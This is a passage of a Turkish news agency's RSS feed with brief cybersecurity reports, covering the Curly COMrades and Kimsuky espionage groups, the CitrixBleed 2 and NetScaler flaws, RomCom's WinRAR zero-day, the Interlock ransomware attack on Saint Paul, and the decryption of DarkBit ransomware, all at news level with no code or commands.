<li data-start="1383" data-end="1447">
<p data-start="1385" data-end="1447">cihazın firmware düzeyinde güvenlik fonksiyonları bulunuyor.</p>
</li>
</ul>
<p data-start="1449" data-end="1811"><strong data-start="1449" data-end="1477">Kullanıcılar için anlamı</strong><br data-start="1477" data-end="1480">Google’a göre akıllı telefonlar artık yalnızca kişisel bilgileri değil, aynı zamanda yapay zekâ modelleriyle işlenen yüksek değerli verileri de barındırıyor. Bu da saldırganlar için cazip bir hedef oluşturuyor. SESIP Level 5 sertifikası, Android cihazlarda bu verilerin güvenliğinin daha üst düzeyde sağlanacağı anlamına geliyor.</p>
<p data-start="1813" data-end="2079"><strong data-start="1813" data-end="1836">Google’dan açıklama</strong><br data-start="1836" data-end="1839">Android Güvenlik ve Gizlilik Başkan Yardımcısı Dave Kleidermacher, “Cihaz üzerinde yapılan işlemeler arttıkça, kişisel veriler daha değerli hale geliyor. Bu nedenle güçlü güvenlik önlemleri zorunlu” diyerek sertifikanın önemini vurguladı.</p>
<p data-start="2081" data-end="2298"><strong data-start="2081" data-end="2093"></strong></p>
<p></p>
<p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]> </content:encoded>
</item>

<item>
<title>Curly COMrades siber casusluk grubu, Gürcistan ve Moldova’daki devlet kurumlarını özel geliştirilmiş MucorAgent zararlısıyla hedef aldı</title>
<link>https://www.ajansexpres.com.tr/curly-comrades-siber-casusluk-grubu-gurcistan-ve-moldovadaki-devlet-kurumlarini-oezel-gelistirilmis-mucoragent-zararlisiyla-hedef-aldi</link>
<guid>https://www.ajansexpres.com.tr/curly-comrades-siber-casusluk-grubu-gurcistan-ve-moldovadaki-devlet-kurumlarini-oezel-gelistirilmis-mucoragent-zararlisiyla-hedef-aldi</guid>
<description><![CDATA[ Bitdefender’ın raporuna göre Rusya’nın çıkarlarıyla uyumlu faaliyetler yürüten Curly COMrades adlı yeni tehdit grubu, 2024’ten bu yana hükümet ve enerji sektörünü hedef alıyor. Grup, .NET tabanlı üç aşamalı MucorAgent arka kapısını, COM nesne ele geçirmeyi ve curl.exe tabanlı veri sızdırma yöntemlerini kullanarak sistemlere kalıcı erişim sağlıyor. ]]></description>
<enclosure url="https://www.ajansexpres.com.tr/uploads/images/202508/image_870x580_68a5ccb88b1da.webp" length="31996" type="image/jpeg"/>
<pubDate>Wed, 20 Aug 2025 16:25:12 +0300</pubDate>
<dc:creator>Haber Koordinatörü</dc:creator>
<media:keywords>Curly COMrades grubu hangi ülkelerdeki kurumları hedef aldı, MucorAgent arka kapısı nasıl çalışıyor, saldırganlar kimlik bilgilerini ele geçirmek için hangi yöntemleri kullandı, kalıcılığı nasıl sağladılar</media:keywords>
<content:encoded><![CDATA[<p></p>
<p data-start="545" data-end="920"><strong data-start="545" data-end="587">Rusya çıkarlarıyla uyumlu operasyonlar</strong><br data-start="587" data-end="590">Bitdefender araştırmacıları, Curly COMrades adını verdikleri yeni bir siber casusluk grubunun Gürcistan’daki devlet ve yargı kurumlarını, Moldova’daki enerji şirketlerini hedef aldığını açıkladı. Grup, bilinen APT’lerle doğrudan örtüşmese de operasyonlarının Rusya’nın jeopolitik hedefleriyle paralellik gösterdiği ifade edildi.</p>
<p data-start="922" data-end="1303"><strong data-start="922" data-end="948">MucorAgent arka kapısı</strong><br data-start="948" data-end="951">Grubun saldırılarında kullandığı MucorAgent zararlısı üç aşamalı yapıya sahip. İlk aşamada COM nesneleri ele geçirilerek ikinci aşama yükleniyor; bu bileşen Windows’un Antimalware Scan Interface (AMSI) korumasını atlatıyor. Üçüncü aşama ise belirli dizinlerde bulunan şifrelenmiş PNG dosyalarındaki verileri (muhtemelen komut dosyaları) çalıştırıyor.</p>
<p data-start="1305" data-end="1669"><strong data-start="1305" data-end="1346">Kalıcı erişim için yaratıcı yöntemler</strong><br data-start="1346" data-end="1349">Araştırmacılar, saldırganların NGEN (Native Image Generator) bileşenini hedef alarak devre dışı görünen ancak belirli durumlarda çalışan zamanlanmış görevleri kötüye kullandığını tespit etti. Ayrıca, Resocks proxy aracı, SOCKS5 sunucuları, SSH + Stunnel tünelleme ve CurlCat gibi özel geliştirilmiş araçlar kullanıldı.</p>
<p data-start="1671" data-end="2046"><strong data-start="1671" data-end="1713">Hedef: Kimlik bilgileri ve ağ hareketi</strong><br data-start="1713" data-end="1716">Saldırganların etki alanı denetleyicilerinden NTDS veritabanını ve LSASS bellek dökümlerini çıkarmaya çalıştığı, ağda kalıcı erişim için geçerli kimlik bilgilerini toplamaya odaklandığı belirtildi. Ayrıca netstat, tasklist, systeminfo, wmic, ipconfig gibi komutlar ve Active Directory keşfi için PowerShell betikleri kullanıldı.</p>
<p data-start="2048" data-end="2324"><strong data-start="2048" data-end="2084">Gizlilik çabaları sonuçsuz kaldı</strong><br data-start="2084" data-end="2087">Curly COMrades’in “living-off-the-land” teknikleri, açık kaynak araçları ve yoğun COM manipülasyonlarıyla gizlilik sağlamaya çalıştığı, ancak modern EDR/XDR sistemlerinin bu faaliyetleri tespit edecek kadar gürültü oluştuğu kaydedildi.</p>
<p data-start="2326" data-end="2550"><strong data-start="2326" data-end="2338"></strong></p>
<p></p>
<p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]> </content:encoded>
</item>

<item>
<title>3.300’den fazla Citrix NetScaler cihazı kritik “CitrixBleed 2” açığına karşı yamalanmadan bırakıldı</title>
<link>https://www.ajansexpres.com.tr/3300den-fazla-citrix-netscaler-cihazi-kritik-citrixbleed-2-acigina-karsi-yamalanmadan-birakildi</link>
<guid>https://www.ajansexpres.com.tr/3300den-fazla-citrix-netscaler-cihazi-kritik-citrixbleed-2-acigina-karsi-yamalanmadan-birakildi</guid>
<description><![CDATA[ Shadowserver Foundation’ın raporuna göre, CVE-2025-5777 kodlu “CitrixBleed 2” açığına karşı yamalar yayımlanmasının üzerinden iki ay geçmesine rağmen binlerce NetScaler cihazı hâlâ savunmasız durumda. Açık, saldırganların kimlik doğrulamayı atlatıp kullanıcı oturumlarını ele geçirmesine ve MFA’yı aşmasına imkân tanıyor. ]]></description>
<enclosure url="https://www.ajansexpres.com.tr/uploads/images/202508/image_870x580_68a5ccb36f183.webp" length="39606" type="image/jpeg"/>
<pubDate>Wed, 20 Aug 2025 16:25:07 +0300</pubDate>
<dc:creator>Haber Koordinatörü</dc:creator>
<media:keywords>CitrixBleed 2 açığı saldırganlara hangi imkânları veriyor, dünya genelinde kaç cihaz savunmasız durumda, Hollanda’da hangi kurumlar etkilendi, CISA bu açıklarla ilgili hangi adımları zorunlu tuttu</media:keywords>
<content:encoded><![CDATA[<p></p>
<p data-start="481" data-end="804"><strong data-start="481" data-end="523">Kritik açığa karşı cihazlar savunmasız</strong><br data-start="523" data-end="526">Citrix NetScaler cihazlarında tespit edilen CVE-2025-5777 (CitrixBleed 2) açığı, yetersiz girdi doğrulaması nedeniyle oluşan “out-of-bounds memory read” hatasından kaynaklanıyor. Hedef alınan cihazlar arasında VPN, ICA Proxy, CVPN, RDP Proxy ve AAA sanal sunucuları bulunuyor.</p>
<p data-start="806" data-end="1141"><strong data-start="806" data-end="834">Oturum ele geçirme riski</strong><br data-start="834" data-end="837">Açık, saldırganlara oturum belirteçleri, kimlik bilgileri ve hassas verileri çalma imkânı tanıyor. Böylece kullanıcı oturumlarını ele geçirerek çok faktörlü kimlik doğrulamayı atlatabiliyorlar. Açık ilk olarak sıfır gün saldırılarında istismar edildi, kısa süre sonra da PoC exploit kodları yayımlandı.</p>
<p data-start="1143" data-end="1421"><strong data-start="1143" data-end="1173">Hâlâ binlerce cihaz açıkta</strong><br data-start="1173" data-end="1176">Shadowserver’ın 11 Ağustos raporuna göre dünya genelinde 3.312 cihaz hâlâ CVE-2025-5777’e karşı korunmasız. Ayrıca 4.142 cihaz, DoS saldırılarında aktif olarak istismar edilen başka bir kritik açık (CVE-2025-6543) için de yamalanmamış durumda.</p>
<p data-start="1423" data-end="1829"><strong data-start="1423" data-end="1467">Hollanda’da kritik kurumlar hedef alındı</strong><br data-start="1467" data-end="1470">Hollanda Ulusal Siber Güvenlik Merkezi (NCSC), CVE-2025-6543 açığının Mayıs ayından bu yana sıfır gün olarak kullanıldığını, kritik kuruluşların saldırıya uğradığını ve izlerin saldırganlar tarafından silindiğini duyurdu. Temmuz ayında Hollanda Savcılığı’nın (Openbaar Ministerie) saldırı sonrası e-posta sunucularında haftalarca kesinti yaşadığı açıklandı.</p>
<p data-start="1831" data-end="2110"><strong data-start="1831" data-end="1866">ABD kurumlarına zorunlu talimat</strong><br data-start="1866" data-end="1869">ABD Siber Güvenlik ve Altyapı Güvenliği Ajansı (CISA), iki açığı da aktif istismar edilen zafiyetler listesine ekleyerek federal kurumlara CVE-2025-5777 için 1 gün, CVE-2025-6543 için ise 21 Temmuz’a kadar yamaları uygulama talimatı verdi.</p>
<p data-start="2112" data-end="2327"><strong data-start="2112" data-end="2124"></strong></p>
<p></p>
<p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]> </content:encoded>
</item>

<item>
<title>Saint Paul siber saldırısının arkasında Interlock fidye yazılım grubu çıktı</title>
<link>https://www.ajansexpres.com.tr/saint-paul-siber-saldirisinin-arkasinda-interlock-fidye-yazilim-grubu-cikti</link>
<guid>https://www.ajansexpres.com.tr/saint-paul-siber-saldirisinin-arkasinda-interlock-fidye-yazilim-grubu-cikti</guid>
<description><![CDATA[ Minnesota’nın başkenti Saint Paul’da Temmuz sonunda gerçekleşen siber saldırının Interlock fidye yazılım grubu tarafından düzenlendiği doğrulandı. Şehrin dijital hizmetlerini felç eden saldırı sonrası Ulusal Muhafızlar devreye girdi. Şehir yönetimi fidye ödemeyi reddetti ancak saldırganlar 66 binden fazla dosya çaldıklarını ve bir kısmını sızdırdıklarını iddia ediyor. ]]></description>
<enclosure url="https://www.ajansexpres.com.tr/uploads/images/202508/image_870x580_68a5ccad0847d.webp" length="37522" type="image/jpeg"/>
<pubDate>Wed, 20 Aug 2025 16:25:00 +0300</pubDate>
<dc:creator>Haber Koordinatörü</dc:creator>
<media:keywords>Saint Paul’daki saldırıda hangi hizmetler etkilendi, Interlock hangi verileri sızdırdığını iddia etti, saldırı nasıl gerçekleştirildi, şehir yönetimi fidye talebine nasıl yanıt verdi</media:keywords>
<content:encoded><![CDATA[<p></p>
<p data-start="506" data-end="839"><strong data-start="506" data-end="541">Ulusal Muhafızlar devreye girdi</strong><br data-start="541" data-end="544">29 Temmuz’da yaşanan saldırı sonrası Minnesota Valisi Tim Walz, şehrin olay müdahale kapasitesini aşan bu durum için Ulusal Muhafızları siber koruma desteği vermek üzere görevlendirdi. Şehir, çevrim içi ödemeler de dahil olmak üzere birçok hizmetin geçici olarak kesintiye uğradığını açıkladı.</p>
<p data-start="841" data-end="1119"><strong data-start="841" data-end="873">Interlock saldırıyı üstlendi</strong><br data-start="873" data-end="876">Saint Paul Belediye Başkanı Melvin Carter, saldırının Interlock fidye yazılım grubu tarafından gerçekleştirildiğini ve fidye ödenmediğini doğruladı. Carter, vatandaşların kişisel veya finansal bilgilerinin saldırıdan etkilenmediğini söyledi.</p>
<p data-start="1121" data-end="1354"><strong data-start="1121" data-end="1148">66 bin dosya sızdırıldı</strong><br data-start="1148" data-end="1151">Interlock grubu, karanlık ağdaki sitesinde Saint Paul’u hedef olarak listeledi ve 43 GB büyüklüğünde, 66 binden fazla dosyayı ele geçirdiğini öne sürdü. Saldırganlar bu verilerin bir kısmını yayımladı.</p>
<p data-start="1356" data-end="1558"><strong data-start="1356" data-end="1377">Saldırının izleri</strong><br data-start="1377" data-end="1380">PRODAFT’ın açıklamasına göre saldırı, 20 Temmuz civarında şehir sistemlerine bulaştırılan ve Interlock’la ilişkilendirilen özel geliştirilmiş SystemBC RAT zararlısıyla başladı.</p>
<p data-start="1560" data-end="1968"><strong data-start="1560" data-end="1578">Grubun geçmişi</strong><br data-start="1578" data-end="1581">Eylül 2024’te ortaya çıkan Interlock, dünya genelinde özellikle sağlık kuruluşlarını hedef aldı. Daha önce İngiltere’deki üniversitelere NodeSnake trojanıyla saldırmış, DaVita’dan 1,5 TB ve Kettering Health’ten büyük miktarda veri çaldığını duyurmuştu. CISA ve FBI, saldırıdan günler önce Interlock’un kritik altyapılara yönelik çift şantajlı saldırılarında artış olduğunu açıklamıştı.</p>
<p data-start="1970" data-end="2171"><strong data-start="1970" data-end="1982"></strong></p>
<p></p>
<p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]> </content:encoded>
</item>

<item>
<title>Kuzey Koreli Kimsuky hacker grubu, 8,9 GB’lık veri sızıntısıyla ifşa oldu</title>
<link>https://www.ajansexpres.com.tr/kuzey-koreli-kimsuky-hacker-grubu-89-gblik-veri-sizintisiyla-ifsa-oldu</link>
<guid>https://www.ajansexpres.com.tr/kuzey-koreli-kimsuky-hacker-grubu-89-gblik-veri-sizintisiyla-ifsa-oldu</guid>
<description><![CDATA[ Kuzey Kore devlet destekli siber casusluk grubu Kimsuky’nin altyapısı, kendilerini “etik hacker” olarak tanımlayan iki kişi tarafından ele geçirildi. DEF CON 33’te duyurulan sızıntıda, Güney Kore kurumlarına yönelik oltalama kayıtları, e-posta sistemlerinin kaynak kodları, sahte kimlik avı araçları ve Kimsuky’nin operasyonel altyapısına dair belgeler yer alıyor. ]]></description>
<enclosure url="https://www.ajansexpres.com.tr/uploads/images/202508/image_870x580_68a5cca843c49.webp" length="28608" type="image/jpeg"/>
<pubDate>Wed, 20 Aug 2025 16:24:56 +0300</pubDate>
<dc:creator>Haber Koordinatörü</dc:creator>
<media:keywords>Kimsuky’den sızdırılan veriler neleri içeriyor, sızıntıyı kim üstlendi, bu veri ifşası grubun operasyonlarını nasıl etkileyebilir, güvenlik araştırmacıları sızıntıya nasıl yaklaşıyor</media:keywords>
<content:encoded><![CDATA[<p></p>
<p data-start="498" data-end="872"><strong data-start="498" data-end="529">Kimsuky’ye karşı etik çıkış</strong><br data-start="529" data-end="532">Sızıntıyı gerçekleştiren “Saber” ve “cyb0rg” takma adlı hackerlar, Phrack dergisinin DEF CON 33’te dağıtılan son sayısında, Kimsuky’yi “rejim çıkarlarına hizmet eden, etik dışı bir grup” olarak tanımladı. İkilinin açıklamasında, “Sanatı icra etmek yerine liderlerini zenginleştirmek için çalışan politik bir araçsınız” ifadeleri yer aldı.</p>
<p data-start="874" data-end="1071"><strong data-start="874" data-end="911">8,9 GB veri çevrim içi yayımlandı</strong><br data-start="911" data-end="914">Distributed Denial of Secrets platformunda yayımlanan arşiv, Kimsuky’nin oltalama günlüklerini, çalıntı verilerini ve araçlarını içeriyor. Bunlar arasında:</p>
<ul data-start="1072" data-end="1523">
<li data-start="1072" data-end="1163">
<p data-start="1074" data-end="1163">Güney Kore Savunma Karşı İstihbarat Komutanlığı’na (dcc.mil.kr) ait oltalama kayıtları,</p>
</li>
<li data-start="1164" data-end="1240">
<p data-start="1166" data-end="1240">Güney Kore Dışişleri Bakanlığı’nın e-posta sistemi (“Kebi”) kaynak kodu,</p>
</li>
<li data-start="1241" data-end="1296">
<p data-start="1243" data-end="1296">Vatandaşlık sertifikaları ve akademisyen listeleri,</p>
</li>
<li data-start="1297" data-end="1367">
<p data-start="1299" data-end="1367">Sahte site oluşturma kiti (PHP Generator), canlı oltalama kitleri,</p>
</li>
<li data-start="1368" data-end="1450">
<p data-start="1370" data-end="1450">Cobalt Strike yükleyicileri, ters bağlantı araçları ve Onnara proxy modülleri,</p>
</li>
<li data-start="1451" data-end="1523">
<p data-start="1453" data-end="1523">VPN alımları, GitHub bağlantıları ve hack forumu kullanım kayıtları.</p>
</li>
</ul>
<p data-start="1525" data-end="1804"><strong data-start="1525" data-end="1559">Operasyonel zorluk yaratabilir</strong><br data-start="1559" data-end="1562">Bitirici bir darbe olmasa da, uzmanlara göre bu ifşa Kimsuky’nin altyapısının “yanmasını” sağlayarak devam eden kampanyalarda aksamalara yol açabilir. Ayrıca, sızan belgeler Kimsuky’nin daha önce belgelenmemiş yöntemlerini ortaya çıkarıyor.</p>
<p data-start="1806" data-end="2074"><strong data-start="1806" data-end="1846">Araştırmacılar doğrulamaya çalışıyor</strong><br data-start="1846" data-end="1849">Sızdırılan dosyaların doğruluğu henüz bağımsız olarak tam teyit edilmedi. Ancak içerik, Kimsuky’nin bilinen faaliyetleriyle güçlü örtüşmeler taşıyor. Güvenlik araştırmacıları, sızıntının değerini analiz etmeye devam ediyor.</p>
<p data-start="2076" data-end="2277"><strong data-start="2076" data-end="2088"></strong></p>
<p></p>
<p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]> </content:encoded>
</item>

<item>
<title>Hollanda’da kritik kurumlar, Citrix NetScaler açığı CVE&#45;2025&#45;6543 ile hedef alındı</title>
<link>https://www.ajansexpres.com.tr/hollandada-kritik-kurumlar-citrix-netscaler-acigi-cve-2025-6543-ile-hedef-alindi</link>
<guid>https://www.ajansexpres.com.tr/hollandada-kritik-kurumlar-citrix-netscaler-acigi-cve-2025-6543-ile-hedef-alindi</guid>
<description><![CDATA[ Hollanda Ulusal Siber Güvenlik Merkezi (NCSC), Citrix NetScaler cihazlarındaki CVE-2025-6543 güvenlik açığının kritik kurumlara yönelik saldırılarda istismar edildiğini duyurdu. Bellek taşması hatasından kaynaklanan açık, Mayıs 2025’ten itibaren sıfır gün olarak kullanıldı ve saldırganlar izleri silerek ihlalleri gizledi. ]]></description>
<enclosure url="https://www.ajansexpres.com.tr/uploads/images/202508/image_870x580_68a5cca33c59c.webp" length="43264" type="image/jpeg"/>
<pubDate>Wed, 20 Aug 2025 16:24:51 +0300</pubDate>
<dc:creator>Haber Koordinatörü</dc:creator>
<media:keywords>CVE-2025-6543 açığı nasıl çalışıyor, Hollanda’da hangi kurumlar etkilendi, saldırılar ne zamandan beri sürüyor, Citrix hangi sürümlere güncelleme yapılmasını öneriyor</media:keywords>
<content:encoded><![CDATA[<p></p>
<p data-start="466" data-end="751"><strong data-start="466" data-end="512">Bellek taşması sıfır gün olarak kullanıldı</strong><br data-start="512" data-end="515">Citrix NetScaler ADC ve Gateway ürünlerinde bulunan CVE-2025-6543, bellek taşması nedeniyle yetkisiz komut çalıştırılmasına veya hizmet reddine yol açabiliyor. Açık, VPN, ICA Proxy, CVPN, RDP Proxy ve AAA sanal sunucularını etkiliyor.</p>
<p data-start="753" data-end="998"><strong data-start="753" data-end="783">Kritik kurumlar hedef oldu</strong><br data-start="783" data-end="786">NCSC, Mayıs 2025’ten itibaren saldırganların açığı sıfır gün olarak kullandığını ve Hollanda’daki birden fazla kritik kuruma sızdığını açıkladı. Saldırganlar izlerini silerek olayları tespit etmeyi zorlaştırdı.</p>
<p data-start="1000" data-end="1246"><strong data-start="1000" data-end="1032">Savcılık saldırıyı doğruladı</strong><br data-start="1032" data-end="1035">Hollanda Savcılığı (Openbaar Ministerie), 18 Temmuz’da sistemlerinin ihlal edildiğini duyurdu. Olay ciddi operasyonel kesintilere neden oldu, e-posta sunucuları ancak Ağustos başında yeniden çalışmaya başladı.</p>
<p data-start="1248" data-end="1378"><strong data-start="1248" data-end="1281">Citrix’in yayımladığı yamalar</strong><br data-start="1281" data-end="1284">Citrix, 25 Haziran’da yayımladığı bültende şu sürümlere güncelleme yapılmasını tavsiye etti:</p>
<ul data-start="1379" data-end="1586">
<li data-start="1379" data-end="1411">
<p data-start="1381" data-end="1411">14.1 → 14.1-47.46 ve sonrası</p>
</li>
<li data-start="1412" data-end="1444">
<p data-start="1414" data-end="1444">13.1 → 13.1-59.19 ve sonrası</p>
</li>
<li data-start="1445" data-end="1586">
<p data-start="1447" data-end="1586">13.1-FIPS ve 13.1-NDcPP → 13.1-37.236 ve sonrası<br data-start="1495" data-end="1498">12.1 ve 13.0 sürümleri içinse destek sona erdi, güncel sürümlere yükseltme öneriliyor.</p>
</li>
</ul>
<p data-start="1588" data-end="1877"><strong data-start="1588" data-end="1612">Ek güvenlik adımları</strong><br data-start="1612" data-end="1615">Yamaların ardından aktif oturumların kapatılması (icaconnection, pcoipConnection, aaa, rdp) ve load balancing oturumlarının temizlenmesi tavsiye edildi. Ayrıca NCSC, olağan dışı PHP/XHTML dosyalarının tespiti için GitHub üzerinden bir tarama scripti yayımladı.</p>
<p data-start="1879" data-end="2064"><strong data-start="1879" data-end="1891"></strong></p>
<p></p>
<p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]> </content:encoded>
</item>

<item>
<title>ESET, WinRAR sıfır gün saldırılarında RomCom’un kullandığı üç ayrı zararlı zincirini ortaya çıkardı</title>
<link>https://www.ajansexpres.com.tr/eset-winrar-sifir-gun-saldirilarinda-romcomun-kullandigi-uc-ayri-zararli-zincirini-ortaya-cikardi</link>
<guid>https://www.ajansexpres.com.tr/eset-winrar-sifir-gun-saldirilarinda-romcomun-kullandigi-uc-ayri-zararli-zincirini-ortaya-cikardi</guid>
<description><![CDATA[ Rusya bağlantılı RomCom grubu, CVE-2025-8088 olarak kaydedilen WinRAR yol geçişi açığını kullanarak özel hazırlanmış arşivlerle zararlı yazılımlar dağıttı. ESET’in raporuna göre saldırılar Mythic Agent, SnipBot ve MeltingClaw isimli kötü amaçlı yazılım zincirlerini devreye soktu. Açık, 30 Temmuz’da yayımlanan WinRAR 7.13 sürümüyle kapatıldı. ]]></description>
<enclosure url="https://www.ajansexpres.com.tr/uploads/images/202508/image_870x580_68a5cc9b8c45e.webp" length="36250" type="image/jpeg"/>
<pubDate>Wed, 20 Aug 2025 16:24:43 +0300</pubDate>
<dc:creator>Haber Koordinatörü</dc:creator>
<media:keywords>RomCom grubu WinRAR açığını nasıl kullandı, CVE-2025-8088 açığı hangi zararlı zincirlerle birleşti, saldırılar hangi dosya yollarını hedef aldı, kullanıcılar kendilerini nasıl koruyabilir</media:keywords>
<content:encoded><![CDATA[<p></p>
<p data-start="503" data-end="766"><strong data-start="503" data-end="534">Sıfır gün olarak kullanıldı</strong><br data-start="534" data-end="537">ESET, 18 Temmuz 2025’te RomCom grubunun WinRAR’daki belirsiz bir yol geçişi açığını istismar ettiğini tespit etti. Açık, alternatif veri akışlarının (ADS) kullanımıyla kötüye kullanılabiliyor ve CVE-2025-8088 olarak kaydedildi.</p>
<p data-start="768" data-end="1082"><strong data-start="768" data-end="814">Zararlı dosyalar Startup klasörüne düşüyor</strong><br data-start="814" data-end="817">Hazırlanan RAR arşivlerinde sahte yollarla doldurulmuş çok sayıda ADS girdisi bulunuyor. Bunlar, zararlı DLL, EXE ve LNK dosyalarının arşiv açıldığında %TEMP% ve %LOCALAPPDATA% klasörlerine, kısayolların ise Windows Başlangıç klasörüne yerleştirilmesini sağlıyor.</p>
<p data-start="1084" data-end="1187"><strong data-start="1084" data-end="1113">Üç farklı saldırı zinciri</strong><br data-start="1113" data-end="1116">ESET, saldırılarda kullanılan üç ayrı enfeksiyon zinciri tespit etti:</p>
<ul data-start="1188" data-end="1508">
<li data-start="1188" data-end="1315">
<p data-start="1190" data-end="1315"><strong data-start="1190" data-end="1207">Mythic Agent:</strong> COM hijacking yoluyla AES şifreli shellcode çalıştırıyor, yalnızca belirli etki alanlarında aktif oluyor.</p>
</li>
<li data-start="1316" data-end="1424">
<p data-start="1318" data-end="1424"><strong data-start="1318" data-end="1330">SnipBot:</strong> Sahte bir PuTTY türeviyle yükleniyor, açılan belgeleri kontrol ederek ek zararlı indiriyor.</p>
</li>
<li data-start="1425" data-end="1508">
<p data-start="1427" data-end="1508"><strong data-start="1427" data-end="1443">MeltingClaw:</strong> RustyClaw üzerinden DLL indirip daha fazla modül çalıştırıyor.</p>
</li>
</ul>
<p data-start="1510" data-end="1692"><strong data-start="1510" data-end="1543">Ek aktörler de açığı kullandı</strong><br data-start="1543" data-end="1546">Bi.Zone, CVE-2025-8088’in yanı sıra CVE-2025-6218 açığını da istismar eden “Paper Werewolf” adını verdiği farklı bir saldırı kümesini raporladı.</p>
<p data-start="1694" data-end="1924"><strong data-start="1694" data-end="1725">Güncelleme manuel yapılmalı</strong><br data-start="1725" data-end="1728">RARLab, açığın kapatıldığı 7.13 sürümünü 30 Temmuz’da yayımladı. Ancak WinRAR otomatik güncelleme özelliği içermediği için kullanıcıların en son sürümü manuel olarak indirip kurmaları gerekiyor.</p>
<p data-start="1926" data-end="2145"><strong data-start="1926" data-end="1947">Risk neden yüksek</strong><br data-start="1947" data-end="1950">Windows 2023’te RAR desteği eklese de kapsamı sınırlı. Kurumsal kullanıcılar ve ileri seviye bireysel kullanıcılar hâlen WinRAR’a bağımlı, bu da yazılımı saldırganlar için cazip hale getiriyor.</p>
<p data-start="2147" data-end="2353"><strong data-start="2147" data-end="2159"></strong></p>
<p></p>
<p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]> </content:encoded>
</item>

<item>
<title>MuddyWater bağlantılı DarkBit fidye yazılımı çözüldü, veriler fidye ödemeden kurtarıldı</title>
<link>https://www.ajansexpres.com.tr/muddywater-baglantili-darkbit-fidye-yazilimi-coezuldu-veriler-fidye-oedemeden-kurtarildi</link>
<guid>https://www.ajansexpres.com.tr/muddywater-baglantili-darkbit-fidye-yazilimi-coezuldu-veriler-fidye-oedemeden-kurtarildi</guid>
<description><![CDATA[ Siber güvenlik firması Profero, İran destekli MuddyWater grubuyla ilişkilendirilen DarkBit fidye yazılımının şifreleme mekanizmasını kırarak mağdurların verilerini ücretsiz olarak kurtarmayı başardı. 2023’te VMware ESXi sunucularını hedef alan saldırıda 80 Bitcoin fidye istenmiş, ancak saldırganlar ödeme müzakeresine girmemişti. ]]></description>
<enclosure url="https://www.ajansexpres.com.tr/uploads/images/202508/image_870x580_68a5cc9110716.webp" length="37474" type="image/jpeg"/>
<pubDate>Wed, 20 Aug 2025 16:24:32 +0300</pubDate>
<dc:creator>Haber Koordinatörü</dc:creator>
<media:keywords>DarkBit fidye yazılımını hangi grup geliştirdi, Profero şifreleme açığını nasıl buldu, saldırıda hangi sistemler hedef alındı, mağdurlar verilerini nasıl kurtarabildi</media:keywords>
<content:encoded><![CDATA[<p></p>
<p data-start="478" data-end="868"><strong data-start="478" data-end="521">DarkBit saldırıları ve siyasi arka plan</strong><br data-start="521" data-end="524">2023’te gerçekleşen saldırıların, İran’daki mühimmat fabrikasına yönelik drone saldırılarının ardından misilleme amacı taşıdığı değerlendiriliyor. DarkBit grubu, daha önce İsrail’deki eğitim kurumlarını hedef almış ve propaganda içerikli fidye notları bırakmıştı. İsrail Ulusal Siber Komutanlığı, saldırıları MuddyWater ile ilişkilendirmişti.</p>
<p data-start="870" data-end="1170"><strong data-start="870" data-end="911">Zayıf şifreleme yöntemi tespit edildi</strong><br data-start="911" data-end="914">Profero uzmanları, saldırıda kullanılan DarkBit fidye yazılımını analiz etti. Her dosya için AES-128-CBC ile üretilen anahtarların düşük entropiye sahip olduğu, zaman damgalarıyla birlikte olası kombinasyonların birkaç milyar ihtimale düştüğü keşfedildi.</p>
<p data-start="1172" data-end="1478"><strong data-start="1172" data-end="1204">ESXi sunucularındaki avantaj</strong><br data-start="1204" data-end="1207">Araştırmacılar, VMware sanal disk (VMDK) dosyalarının bilinen başlık baytlarını referans alarak brute force yöntemini hızlandırdı. Ayrıca VMDK dosyalarının seyrek yapısı nedeniyle, şifrelenmemiş geniş boşluklardan değerli verilerin doğrudan kurtarılabildiği belirlendi.</p>
<p data-start="1480" data-end="1756"><strong data-start="1480" data-end="1520">Fidye ödenmeden dosyalar geri alındı</strong><br data-start="1520" data-end="1523">Geliştirilen özel araç sayesinde, saldırganların talep ettiği 80 Bitcoin ödenmeden kritik dosyaların çoğu kurtarıldı. Profero, DarkBit’in fidye yerine veri silici (wiper) kullansaydı amacına daha uygun sonuç alabileceğini belirtti.</p>
<p data-start="1758" data-end="1988"><strong data-start="1758" data-end="1791">Kurtarma aracı halka açılmadı</strong><br data-start="1791" data-end="1794">Profero, DarkBit için geliştirdiği çözüm aracını kamuya açıklamayacağını, ancak gelecekte benzer saldırılardan etkilenen kurumların kendileriyle iletişime geçerek destek alabileceğini duyurdu.</p>
<p data-start="1990" data-end="2175"><strong data-start="1990" data-end="2002"></strong></p>
<p></p>
<p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]> </content:encoded>
</item>

<item>
<title>100 milyon dolarlık dolandırıcılık çetesinin “başkanları” ABD’ye iade edildi</title>
<link>https://www.ajansexpres.com.tr/100-milyon-dolarlik-dolandiricilik-cetesinin-baskanlari-abdye-iade-edildi</link>
<guid>https://www.ajansexpres.com.tr/100-milyon-dolarlik-dolandiricilik-cetesinin-baskanlari-abdye-iade-edildi</guid>
<description><![CDATA[ ABD Adalet Bakanlığı, 2016–2023 yılları arasında aşk dolandırıcılığı ve kurumsal e-posta saldırılarıyla 100 milyon dolardan fazla para çalan uluslararası bir çetenin dört Ganalı yöneticisinin ülkeye iade edildiğini duyurdu. Sanıklar, 20 yıla kadar hapis cezasıyla karşı karşıya. ]]></description>
<enclosure url="https://www.ajansexpres.com.tr/uploads/images/202508/image_870x580_68a5cc80594f1.webp" length="36384" type="image/jpeg"/>
<pubDate>Wed, 20 Aug 2025 16:24:16 +0300</pubDate>
<dc:creator>Haber Koordinatörü</dc:creator>
<media:keywords>100 milyon dolarlık dolandırıcılık çetesi hangi yöntemleri kullandı, kimler ABD’ye iade edildi, örgütte “chairman” rolü ne anlama geliyor, sanıklar hangi cezalarla karşı karşıya</media:keywords>
<content:encoded><![CDATA[<p></p>
